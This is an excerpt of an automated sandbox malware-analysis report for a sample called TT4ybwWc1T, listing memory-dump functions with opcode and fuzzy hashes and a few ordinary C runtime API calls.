Opcode ID: 26548d9b965a6a3f6bcd900cb55e2b2fd03830e120eceaeed261fb62683cd1ce
Instruction ID: 8f5e5fa1331f4104bba647050128709e7387a689053c6ad8905e7ff95450a644
Opcode Fuzzy Hash: 26548d9b965a6a3f6bcd900cb55e2b2fd03830e120eceaeed261fb62683cd1ce
Instruction Fuzzy Hash: 3E416F7260C30D0ED35CFDE496DB397B6D4E38D280F41543F9A018B192FEA4955996D4

Uniqueness

Uniqueness Score: -1.00%

Function 056DBCB9 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e163c3bd523238eaa6f939b65f7c1fbf095d7dd231a39aa80fd0207190361f
Instruction ID: 40907bc83f151cf41a2e168b5cec60a1baa027603d4b38f8e6bf0af4f66a5c39
Opcode Fuzzy Hash: 03e163c3bd523238eaa6f939b65f7c1fbf095d7dd231a39aa80fd0207190361f
Instruction Fuzzy Hash: 7131CBB9D04258DFCB10CFAAD484AEEFBF4AB49310F14905AE415B7310D738A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 056DBCC0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5ae800d46c4b39b641d0103561dae8840cfb8fe6d0fa56500439856695bcbaf
Instruction ID: caf2cbcf7ae28405b2494db2db018cfeb067ea1fb07ad1038a9690ef0cd31cb6
Opcode Fuzzy Hash: f5ae800d46c4b39b641d0103561dae8840cfb8fe6d0fa56500439856695bcbaf
Instruction Fuzzy Hash: 0031DBB5D00258DFCB10CFAAD484AEEFBF4AB49310F14902AE414B7210C738A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 056D3780 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74029279275099dfa487be82c3fcd30c6089867a54ebbe1467b8619d8a9988ec
Instruction ID: dacf41cf0de4b9a38fc5c4a9b028b1469d1ebe3f1916c9a394628714a2fd74d9
Opcode Fuzzy Hash: 74029279275099dfa487be82c3fcd30c6089867a54ebbe1467b8619d8a9988ec
Instruction Fuzzy Hash: FA31C775D01209AFDB04CFA4D880AEEBBB5FF49310F10906AE911B7360DB74AA54CF95

Uniqueness

Uniqueness Score: -1.00%

Function 056D3670 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da0048c16f81d226013a55dcf378d6817c5c76dd20a7640f0b8a3ddfef0c4dc1
Instruction ID: 91c628ded06fc051ee0eebba2595cfb57a41184bbf931932cf5beac7364dc462
Opcode Fuzzy Hash: da0048c16f81d226013a55dcf378d6817c5c76dd20a7640f0b8a3ddfef0c4dc1
Instruction Fuzzy Hash: DB31C475D01209AFDB05CFA4D880AEEBBB5FF49300F10946AE915B7360DB70AA45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 056D39A0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e733806c39099a6360a0f8869845b90eaf733b2d335d3d3a42adcb0f6ec38b1
Instruction ID: e0b84493801884810f0dac54e11f59c291147b540b5335a5abf6c22654ed64a5
Opcode Fuzzy Hash: 5e733806c39099a6360a0f8869845b90eaf733b2d335d3d3a42adcb0f6ec38b1
Instruction Fuzzy Hash: DB31C575D01208AFDB04CFA8D880AEEBBB5FF49310F10906AE511B7360DB70AA45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 056D3890 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ea597a93083a6b12c3201eed9c13594b20a26e083e12d2960d3be72ba0ea67
Instruction ID: 20cae8b4b543fe07ef1f3dc7aadff0c340b9a35fda9165ec216e108072ace596
Opcode Fuzzy Hash: 94ea597a93083a6b12c3201eed9c13594b20a26e083e12d2960d3be72ba0ea67
Instruction Fuzzy Hash: DF31B375D01208AFDB04DFA4D880AEEBBB5FF89310F10906AE511B7360DB70AA44CF95

Uniqueness

Uniqueness Score: -1.00%

Function 056D3788 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d08bcb7dca2074ff8848966cf7b43795ad0df826b3540f3b4877064d04cb6b16
Instruction ID: e8a2e8abc01d3e27b27047040263fc9f261262f905963d8509ae52aec1a3c332
Opcode Fuzzy Hash: d08bcb7dca2074ff8848966cf7b43795ad0df826b3540f3b4877064d04cb6b16
Instruction Fuzzy Hash: 4D31A575D01209AFDB04CFA5D880AEEBBB5FF49310F10906AE915B7360DB70AA44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 056D3678 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a7314e4408bbd8c63e5a233e254c8fa62400eeefd71986662d7864b65e1a91
Instruction ID: 00f8a3ca34fc3c10cd38e1b069474789214b429f734010191ddf73a5d9e3faf1
Opcode Fuzzy Hash: f2a7314e4408bbd8c63e5a233e254c8fa62400eeefd71986662d7864b65e1a91
Instruction Fuzzy Hash: 2831A775D012099FDB04CFA5D880AEEFBB5FF49310F109069E515B7360DB70AA44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 056D39A8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6bbc335dd6d82491793cffdfe6cd9cd0938fba801a6d39105e0a4228dd0964
Instruction ID: 62ee36c93ea36e12ec8110341361dcaf44b36a10c45615fdd1cc11df10f634c2
Opcode Fuzzy Hash: 3c6bbc335dd6d82491793cffdfe6cd9cd0938fba801a6d39105e0a4228dd0964
Instruction Fuzzy Hash: 2F31A775D012089FDB04CFA5D880AEEFBB5FF49310F109069E515B7360DB70AA44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 056D3898 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 329605116767a7b854a9cf2fa329448efebd110876b65fbeef797cf67043b36e
Instruction ID: f8a5cdcb02191f33a6091d7e197160f2de16b91c1e21ea2f31ddde673a40823d
Opcode Fuzzy Hash: 329605116767a7b854a9cf2fa329448efebd110876b65fbeef797cf67043b36e
Instruction Fuzzy Hash: 8F31A575D01208AFDB04DFA5D880AEEBBB5FF49310F10906AE915B7360DB70AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 056D6710 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bae1fbc0f70e38c94a3ec71bfee5640ead744e2868ea7b7ab5625355321293
Instruction ID: 8a94392b97d20ffc89fae8388949509e0466e546c9dbb03e655bdb32aaed5e40
Opcode Fuzzy Hash: 15bae1fbc0f70e38c94a3ec71bfee5640ead744e2868ea7b7ab5625355321293
Instruction Fuzzy Hash: 7D31E0B5D042089FCB10CFA9D584ADEFBF5EB49320F14905AE819B3310C775A905CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E6650 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
Instruction ID: bb3126c3995352c48d5c4c3ac2e878661bcaa32825ecc80765e135c10b3c8d77
Opcode Fuzzy Hash: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
Instruction Fuzzy Hash: 0C21EB3571A5564BD705CE2DC480896B7A7EF8E31471981F9E508CB293C670ED16C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 056DB7F0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372910156.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56d0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e5a257e7319f0ea1360344b6af80e1113c0667c39bb8b7a4c62e9e1c1c6c9e
Instruction ID: 7b1447feedcee0f8ecd95480ad26c3a209eb8576ebb134f5d5ca6e53acbdd80c
Opcode Fuzzy Hash: 95e5a257e7319f0ea1360344b6af80e1113c0667c39bb8b7a4c62e9e1c1c6c9e
Instruction Fuzzy Hash: F52199B9D052089FCB10CFA9D984ADEFBF5EB49320F24901AE819B3310C775A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02ACA600 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1362808742.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d14952f3b869bf1795bc24eabd1922893fbe07eb9834d37bc8dd324b93c6a70
Instruction ID: 369b5126280c83507fb7dc078edb5b8e306d35dc157ff472b6500c3ec40b23e5
Opcode Fuzzy Hash: 5d14952f3b869bf1795bc24eabd1922893fbe07eb9834d37bc8dd324b93c6a70
Instruction Fuzzy Hash: 0D210571E046188FEB18CF6BD8407EABAF7AFC9300F14C0AAD54CA6255DF3449858F14

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E8B30 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
Instruction ID: 362d186ee737f7a2110c3822352e6179ecd0d09a2a9abddfc488fe3716b62968
Opcode Fuzzy Hash: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
Instruction Fuzzy Hash: AA218E757056874BE715CF2EC84059BBBA3EFDD300B1984A7E858DB242C674E866CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8EC7B0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
Instruction ID: cb6a7f202bfa16da517e3e7b31f24f4a43f5b92a2882d39ce2056ccb1b4de58f
Opcode Fuzzy Hash: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
Instruction Fuzzy Hash: E611E93570AA420BF314CE2EE880483BB93AFCF31476A85AEA454DF147C771E416C681

Uniqueness

Uniqueness Score: -1.00%

Function 6C8EA7E0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef0fe430f5274c6fa702dd06a168edf7b4634a1fa37fbabfcf4ba1ecb026e4e8
Instruction ID: 2304e0833f73e825b1eecd970a7f9958e47d84cd541255b58dd4bc78d47f11db
Opcode Fuzzy Hash: ef0fe430f5274c6fa702dd06a168edf7b4634a1fa37fbabfcf4ba1ecb026e4e8
Instruction Fuzzy Hash: B911E431A056A24BD3118E2DC8406C6BF77AF9EB10B0A85AAE854DF217C674981BC7D0

Uniqueness

Uniqueness Score: -1.00%

Function 6C9484B0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71f965e803a3573da4db230274ae4e8c29828e75213b8f24d4df4e1c2e3bf17d
Instruction ID: 39342e6a3b10779db9c796b2a3fdaae4241a11d9f6783227ff5db151fb70ea8b
Opcode Fuzzy Hash: 71f965e803a3573da4db230274ae4e8c29828e75213b8f24d4df4e1c2e3bf17d
Instruction Fuzzy Hash: 49115E72A09609EFC714CF59D841799FBF5FB85724F20866EE819D3B80D735A940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C956FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBCMT ref: 6C956FCC

Part of subcall function 6C954147: DName::DName.LIBCMT ref: 6C95415A
Part of subcall function 6C954147: DName::operator+.LIBCMT ref: 6C954161

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: a971d72ee7d48d825343ba2456961684a0de2a1b6a4b1a4d246ac566f2f3f863
Instruction ID: 46fab70973b213dd9708ec4f8206b0b856869778527f865e5e91a229c628f19b
Opcode Fuzzy Hash: a971d72ee7d48d825343ba2456961684a0de2a1b6a4b1a4d246ac566f2f3f863
Instruction Fuzzy Hash: 27D14F71911209AFDF00DFA8D881AEDBBF8BF25314F90816AE501E7790DB31DA59CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C94EC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94ECA5
__mtterm.LIBCMT ref: 6C94ECB1

Part of subcall function 6C94E97C: DecodePointer.KERNEL32(00000012,6C94A397,6C94A37D,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94E98D
Part of subcall function 6C94E97C: TlsFree.KERNEL32(00000020,6C94A397,6C94A37D,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94E9A7
Part of subcall function 6C94E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6C94A397,6C94A37D,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C952325
Part of subcall function 6C94E97C: DeleteCriticalSection.KERNEL32(00000020,?,?,6C94A397,6C94A37D,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C95234F

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6C94ECC7
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6C94ECD4
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6C94ECE1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6C94ECEE
TlsAlloc.KERNEL32(?,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94ED3E
TlsSetValue.KERNEL32(00000000,?,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94ED59
__init_pointers.LIBCMT ref: 6C94ED63
EncodePointer.KERNEL32(?,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94ED74
EncodePointer.KERNEL32(?,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94ED81
EncodePointer.KERNEL32(?,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94ED8E
EncodePointer.KERNEL32(?,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94ED9B
DecodePointer.KERNEL32(Function_0006EB00,?,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94EDBC
__calloc_crt.LIBCMT ref: 6C94EDD1
DecodePointer.KERNEL32(00000000,?,?,6C94A2D4,6C9795C0,00000008,6C94A468,?,?,?,6C9795E0,0000000C,6C94A523,?), ref: 6C94EDEB
GetCurrentThreadId.KERNEL32 ref: 6C94EDFD

Strings

FlsAlloc, xrefs: 6C94ECC1
KERNEL32.DLL, xrefs: 6C94ECA0
FlsFree, xrefs: 6C94ECE3
FlsSetValue, xrefs: 6C94ECD6
FlsGetValue, xrefs: 6C94ECC9

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1868149495-3819984048
Opcode ID: 92b43ae32362e0721483c615099f5dbefbba38324f9ddbb0ce3bf2d1dd0e4fbe
Instruction ID: 26982fe209cc8107f23201101f5a0d950cf6a69ac4326eb55ec5221b243ec44c
Opcode Fuzzy Hash: 92b43ae32362e0721483c615099f5dbefbba38324f9ddbb0ce3bf2d1dd0e4fbe
Instruction Fuzzy Hash: 96316031A0A3149BEF11FFB69808A267BB4BB576587354A2BE56093ED0DB30D442DFD0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F0EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8F0EF2
std::_Xinvalid_argument.LIBCPMT ref: 6C8F0F14
_memmove.LIBCMT ref: 6C8F0F70
_memmove.LIBCMT ref: 6C8F0F95
_memmove.LIBCMT ref: 6C8F0FA9
_memmove.LIBCMT ref: 6C8F0FDB
_memmove.LIBCMT ref: 6C8F1182
std::_Xinvalid_argument.LIBCPMT ref: 6C8F11B6

Strings

string too long, xrefs: 6C8F0EED, 6C8F0F0F
invalid string position, xrefs: 6C8F11B1

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: ed328472a123409d9db211723955d07130f1506be7bac314b168b06411782e0e
Instruction ID: 22caa7a65b5567dc1e8f5a47dfbc0863715e48421007e0487696aca7fb78fbf0
